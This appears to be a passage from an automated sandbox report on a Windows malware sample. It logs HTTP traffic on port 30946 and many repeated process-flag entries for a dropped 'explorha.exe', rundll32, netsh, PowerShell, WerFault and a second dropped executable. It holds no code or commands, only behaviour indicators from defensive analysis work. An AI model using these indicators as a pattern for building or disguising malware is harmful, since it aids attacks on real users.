                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50462
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50461
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50462
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50784 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50785 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50784 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50785 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50784
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50785
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
